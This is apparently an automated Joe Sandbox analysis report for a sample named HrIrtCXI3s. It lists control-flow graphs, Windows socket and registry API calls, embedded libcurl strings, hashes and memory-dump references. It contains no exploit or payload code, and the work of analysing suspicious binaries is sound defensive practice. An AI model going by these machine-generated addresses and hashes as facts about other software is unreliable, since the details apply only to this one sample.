943->878 943->889 952->732
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00599946
                                                      • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00599974
                                                      • RegCloseKey.KERNELBASE(?), ref: 0059998B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                      • API String ID: 3677997916-615551945
                                                      • Opcode ID: 84e61e07bd607ba4a2c641a245edabf6bbc1d5cf874e301da068443aaaf1bc26
                                                      • Instruction ID: 6927826f9f9003410290c1cea83b67f6399b47ecff1a216ecc198a075c4f2eea
                                                      • Opcode Fuzzy Hash: 84e61e07bd607ba4a2c641a245edabf6bbc1d5cf874e301da068443aaaf1bc26
                                                      • Instruction Fuzzy Hash: B83298B5904202ABEF11AB24ED46A1B7EE8BF95354F084838FD0997263F721ED15C793

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 953 508b50-508b69 954 508be6 953->954 955 508b6b-508b74 953->955 958 508be9 954->958 956 508b76-508b8d 955->956 957 508beb-508bf2 955->957 959 508bf3-508bfe call 50a550 956->959 960 508b8f-508ba7 call 4e6e40 956->960 958->957 965 508de4-508def 959->965 966 508c04-508c08 959->966 967 508cd9-508d16 SleepEx getsockopt 960->967 968 508bad-508baf 960->968 969 508df5-508e19 call 50a150 965->969 970 508e8c-508e95 965->970 971 508dbd-508dc3 966->971 972 508c0e-508c1d 966->972 975 508d22 967->975 976 508d18-508d20 967->976 973 508bb5-508bb9 968->973 974 508ca6-508cb0 968->974 1011 508e88 969->1011 1012 508e1b-508e26 969->1012 977 508f00-508f06 970->977 978 508e97-508e9c 970->978 971->958 980 508c35-508c48 call 50a150 972->980 981 508c1f-508c30 connect 972->981 973->957 983 508bbb-508bc2 973->983 974->967 982 508cb2-508cb8 974->982 984 508d26-508d39 975->984 976->984 977->957 987 508e9e-508eb6 call 4e2a00 978->987 988 508edf-508eef call 4d78b0 978->988 1013 508c4d-508c4f 980->1013 981->980 990 508ddc-508dde 982->990 991 508cbe-508cd4 call 50b180 982->991 983->957 992 508bc4-508bcc 983->992 985 508d43-508d61 call 4ed8c0 call 50a150 984->985 986 508d3b-508d3d 984->986 1015 508d66-508d74 985->1015 986->985 986->990 987->988 1010 508eb8-508edd call 4e3410 * 2 987->1010 1008 508ef2-508efc 988->1008 990->958 990->965 991->965 998 508bd4-508bda 992->998 999 508bce-508bd2 992->999 998->957 1006 508bdc-508be1 998->1006 999->957 999->998 1014 508dac-508db8 call 5150a0 1006->1014 1008->977 1010->1008 1011->970 1017 508e28-508e2c 1012->1017 1018 508e2e-508e85 call 4ed090 call 514fd0 1012->1018 1019 508c51-508c58 1013->1019 1020 508c8e-508c93 1013->1020 1014->957 1015->957 1024 508d7a-508d81 1015->1024 1017->1011 1017->1018 1018->1011 1019->1020 1027 508c5a-508c62 1019->1027 1022 508dc8-508dd9 call 50b100 1020->1022 1023 508c99-508c9f 1020->1023 1022->990 1023->974 1024->957 1030 508d87-508d8f 1024->1030 1032 508c64-508c68 1027->1032 1033 508c6a-508c70 1027->1033 1035 508d91-508d95 1030->1035 1036 508d9b-508da1 1030->1036 1032->1020 1032->1033 1033->1020 1039 508c72-508c8b call 5150a0 1033->1039 1035->957 1035->1036 1036->957 1041 508da7 1036->1041 1039->1020 1041->1014
                                                      APIs
                                                      • connect.WS2_32(?,?,00000001), ref: 00508C30
                                                      • SleepEx.KERNELBASE(00000000,00000000), ref: 00508CF3
                                                      • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00508D0E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: Sleepconnectgetsockopt
                                                      • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                      • API String ID: 1669343778-879669977
                                                      • Opcode ID: af46befefbc1b6f5051fa1989e8032b4c324e8d5aec59ec08ab2cbb3f213f7c8
                                                      • Instruction ID: 6ec8297eb0084aa9cc25f2812e5146c5d01cadcb5be3275f9d300e1b367f1d0d
                                                      • Opcode Fuzzy Hash: af46befefbc1b6f5051fa1989e8032b4c324e8d5aec59ec08ab2cbb3f213f7c8
                                                      • Instruction Fuzzy Hash: EDB1A070604706AFE710CF24C885FBA7BA4BF95318F148A2DE8995B2D2DB75EC44C762

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1144 4d2f17-4d2f8c call 9598f0 call 959ce0 1149 4d31c9-4d31cd 1144->1149 1150 4d2f91-4d2ff4 call 4d1619 RegOpenKeyExA 1149->1150 1151 4d31d3-4d31d6 1149->1151 1154 4d2ffa-4d300b 1150->1154 1155 4d31c5 1150->1155 1156 4d315c-4d31ac RegEnumKeyExA 1154->1156 1155->1149 1157 4d3010-4d3083 call 4d1619 RegOpenKeyExA 1156->1157 1158 4d31b2-4d31c2 RegCloseKey 1156->1158 1161 4d314e-4d3152 1157->1161 1162 4d3089-4d30d4 RegQueryValueExA 1157->1162 1158->1155 1161->1156 1163 4d313b-4d314b RegCloseKey 1162->1163 1164 4d30d6-4d3137 call 959bc0 call 959c50 call 959ce0 call 959af0 call 959ce0 call 958050 1162->1164 1163->1161 1164->1163
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: CloseEnumOpen
                                                      • String ID: d
                                                      • API String ID: 1332880857-2564639436
                                                      • Opcode ID: 368e000774a9f825193ec1a19b94ef294b625eabf065bd625cb0dad0268f76a8
                                                      • Instruction ID: 7da91b633b5bc2e83e14401f7e5129b28c2382d1ee79973f4b2eefb277db578e
                                                      • Opcode Fuzzy Hash: 368e000774a9f825193ec1a19b94ef294b625eabf065bd625cb0dad0268f76a8
                                                      • Instruction Fuzzy Hash: 827184B49083199FDB10DF69D98579EBBF0BF85308F10886DE89897311D7749A88CF92

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1177 4d76a0-4d76be 1178 4d76e6-4d76f2 send 1177->1178 1179 4d76c0-4d76c7 1177->1179 1181 4d775e-4d7762 1178->1181 1182 4d76f4-4d7709 call 4d72a0 1178->1182 1179->1178 1180 4d76c9-4d76d1 1179->1180 1183 4d770b-4d7759 call 4d72a0 call 4dcb20 call 858c50 1180->1183 1184 4d76d3-4d76e4 1180->1184 1182->1181 1183->1181 1184->1182
                                                      APIs
                                                      • send.WS2_32(multi.c,?,?,?,N=M,00000000,?,?,004E07BF), ref: 004D76EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: send
                                                      • String ID: LIMIT %s:%d %s reached memlimit$N=M$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                      • API String ID: 2809346765-2691544196
                                                      • Opcode ID: 81c392d4da2fba290c916a3286935d6bf988eddc40f40095e44199a4081bff4c
                                                      • Instruction ID: 6b426b2b7e1260afc725dce712b9710a239fe1c02bc9dbdd09f65385efc5e03b
                                                      • Opcode Fuzzy Hash: 81c392d4da2fba290c916a3286935d6bf988eddc40f40095e44199a4081bff4c
                                                      • Instruction Fuzzy Hash: DB113AB5A093147FE12097259C57E2B7B9CEBC2B2CF450D1BB80863352F5699D0086B6

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1296 509290-5092ed call 4d76a0 1299 5093c3-5093ce 1296->1299 1300 5092f3-5092fb 1296->1300 1309 5093d0-5093e1 1299->1309 1310 5093e5-509427 call 4ed090 call 514f40 1299->1310 1301 509301-509333 call 4ed8c0 call 4ed9a0 1300->1301 1302 5093aa-5093af 1300->1302 1321 509335-509364 WSAIoctl 1301->1321 1322 5093a7 1301->1322 1303 5093b5-5093bc 1302->1303 1304 509456-509470 1302->1304 1307 509429-509431 1303->1307 1308 5093be 1303->1308 1312 509433-509437 1307->1312 1313 509439-50943f 1307->1313 1308->1304 1309->1303 1314 5093e3 1309->1314 1310->1304 1310->1307 1312->1304 1312->1313 1313->1304 1317 509441-509453 call 5150a0 1313->1317 1314->1304 1317->1304 1325 509366-50936f 1321->1325 1326 50939b-5093a4 1321->1326 1322->1302 1325->1326 1328 509371-509390 setsockopt 1325->1328 1326->1322 1328->1326 1329 509392-509395 1328->1329 1329->1326
                                                      APIs
                                                      • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0050935D
                                                      • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00509389
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: Ioctlsetsockopt
                                                      • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                      • API String ID: 1903391676-2691795271
                                                      • Opcode ID: 9816ee21ff89233cb030f1d1d28438c38fb8b81503b6445118548688a7ca85f0
                                                      • Instruction ID: 59310f16cb0f3fe8a0eb3312eb1197f3d318fb55f3f5c892b956f5dc4354f526
                                                      • Opcode Fuzzy Hash: 9816ee21ff89233cb030f1d1d28438c38fb8b81503b6445118548688a7ca85f0
                                                      • Instruction Fuzzy Hash: C751E570604305ABEB10DF24C881FAABBA5FF84314F148929FD489B2C7E774E991CB91

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1349 4d75e0-4d75ed 1350 4d75ef-4d75f6 1349->1350 1351 4d7607-4d7629 socket 1349->1351 1350->1351 1352 4d75f8-4d75ff 1350->1352 1353 4d763f-4d7642 1351->1353 1354 4d762b-4d763c call 4d72a0 1351->1354 1355 4d7601-4d7602 1352->1355 1356 4d7643-4d7699 call 4d72a0 call 4dcb20 call 858c50 1352->1356 1354->1353 1355->1351
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: socket
                                                      • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                      • API String ID: 98920635-842387772
                                                      • Opcode ID: b5ccc142843c4c527b5aea7b470c3112611e55113aa74febe65d0c63964ce94b
                                                      • Instruction ID: 4ef1b128c7081579fd97d7642047f3cb8c818d1ac539af43200c705e75a3447f
                                                      • Opcode Fuzzy Hash: b5ccc142843c4c527b5aea7b470c3112611e55113aa74febe65d0c63964ce94b
                                                      • Instruction Fuzzy Hash: CC112975A052513BD6205A29AC27F4B3F88EBC2B39F451927F814A33D2E615CD5482E5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1562 858e90-858eb8 _open 1563 858eff-858f2c call 859f70 1562->1563 1564 858eba-858ec7 1562->1564 1574 858f39-858f51 call 858ca8 1563->1574 1565 858ef3-858efa call 858d20 1564->1565 1566 858ec9 1564->1566 1565->1563 1568 858ee2-858ef1 1566->1568 1569 858ecb-858ecd 1566->1569 1568->1565 1568->1566 1572 961670-961687 1569->1572 1573 858ed3-858ed6 1569->1573 1575 96168a-9616b1 1572->1575 1576 961689 1572->1576 1573->1568 1577 858ed8 1573->1577 1581 858f30-858f37 1574->1581 1582 858f53-858f5e call 858cc0 1574->1582 1580 9616b9-9616bf 1575->1580 1577->1568 1583 9616c1-9616cf 1580->1583 1584 9616d9-9616fb 1580->1584 1581->1574 1581->1582 1582->1564 1587 9616d5-9616d8 1583->1587 1589 961706-96171b 1584->1589 1590 9616fd-961704 1584->1590 1589->1583 1590->1589 1591 96171d-961732 1590->1591 1591->1587
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: _open
                                                      • String ID: terminated$@
                                                      • API String ID: 4183159743-3016906910
                                                      • Opcode ID: 957b5f02cb2be1aa99d87e8b3836188dfac9dc5e6ee9f88dadf5779a596182ad
                                                      • Instruction ID: 75c3b9e417b65e0da7240232b75cc58e5ca65df49b50a6f636eccbf081283028
                                                      • Opcode Fuzzy Hash: 957b5f02cb2be1aa99d87e8b3836188dfac9dc5e6ee9f88dadf5779a596182ad
                                                      • Instruction Fuzzy Hash: 824149B0904305DFDB10EF79C44566EBBF4FB48318F048A2EE894D7290EB74D9098B56

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1594 50a150-50a159 1595 50a250 1594->1595 1596 50a15f-50a17b 1594->1596 1597 50a181-50a1ce getsockname 1596->1597 1598 50a249-50a24f 1596->1598 1599 50a1d0-50a1f5 call 4ed090 1597->1599 1600 50a1f7-50a214 call 50ef30 1597->1600 1598->1595 1608 50a240-50a246 call 514f40 1599->1608 1600->1598 1604 50a216-50a23b call 4ed090 1600->1604 1604->1608 1608->1598
                                                      APIs
                                                      • getsockname.WS2_32(?,?,00000080), ref: 0050A1C7
                                                      Strings
                                                      • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0050A23B
                                                      • getsockname() failed with errno %d: %s, xrefs: 0050A1F0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                      • API String ID: 3358416759-2605427207
                                                      • Opcode ID: db6b56a1d60774bcd44b3cc1720bc8601b93d333f3c2e7ad866b5e978b2e471b
                                                      • Instruction ID: 3f91f266390627aac9a555c58bc1b2fc4f212df512bd40ef02bcb9493af6b395
                                                      • Opcode Fuzzy Hash: db6b56a1d60774bcd44b3cc1720bc8601b93d333f3c2e7ad866b5e978b2e471b
                                                      • Instruction Fuzzy Hash: CA21FB71808381B6F6219729DC46FE777ACFF81328F040615FE9853191FE32598587E2

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1614 4ed5e0-4ed5ee 1615 4ed652-4ed662 WSAStartup 1614->1615 1616 4ed5f0-4ed604 call 4ed690 1614->1616 1617 4ed664-4ed66f 1615->1617 1618 4ed670-4ed676 1615->1618 1622 4ed61b-4ed651 call 4f7620 1616->1622 1623 4ed606-4ed614 1616->1623 1618->1616 1620 4ed67c-4ed68d 1618->1620 1623->1622 1628 4ed616 1623->1628 1628->1622
                                                      APIs
